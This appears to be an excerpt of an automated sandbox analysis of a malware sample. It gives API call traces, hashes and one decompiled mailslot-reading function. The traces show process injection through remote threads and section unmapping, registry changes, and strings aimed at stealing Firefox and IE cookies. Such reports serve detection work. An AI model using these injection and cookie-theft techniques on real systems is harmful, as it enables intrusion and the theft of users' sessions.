  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
